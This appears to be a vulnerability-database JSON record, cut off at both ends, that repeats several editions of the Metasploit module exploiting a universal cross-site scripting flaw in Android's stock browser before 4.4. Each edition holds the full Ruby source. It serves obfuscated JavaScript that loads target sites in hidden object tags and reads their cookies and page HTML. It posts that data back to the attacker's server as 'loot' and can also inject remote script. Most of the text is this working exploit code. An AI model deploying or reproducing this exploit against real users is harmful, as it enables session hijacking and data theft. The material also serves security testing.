'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-19T21:53:22", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-19T23:46:10", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-19T23:46:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-19T23:46:10", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T21:42:33", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-22T21:42:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-22T21:42:33", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-23T07:45:02", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-23T07:45:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-23T07:45:02", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-25T11:46:34", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-25T11:46:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-25T11:46:34", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-25T13:48:07", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-25T13:48:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-25T13:48:07", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-28T09:52:29", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-28T09:52:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
